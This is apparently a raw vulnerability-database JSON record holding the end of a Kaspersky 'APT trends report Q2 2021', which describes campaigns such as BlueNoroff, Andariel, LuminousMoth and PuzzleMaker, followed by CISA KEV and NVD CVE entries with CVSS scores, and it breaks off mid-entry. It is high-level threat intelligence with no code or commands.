"BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.\n\nOn 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.\n\nAn e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.\n\nA few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turns connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nOn April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.\n\nCooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q2 2021:\n\n * We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.\n * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.\n * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware.\n * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T10:00:46", "type": "securelist", "title": "APT trends report Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-07-29T10:00:46", "id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerability. This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31199", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerability. This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31201", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Desktop Window Manager (DWM) Core Library Privilege Escalation Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft DWM Core Library Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-33739", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Adobe Acrobat and Reader Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-28550", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31955", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Chromium V8 JavaScript Engine Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21224", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows NTFS Privilege Escalation Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows NTFS Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Platform Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-33742", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:20:07", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31201", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31201", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:20:06", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31199", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31199", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", 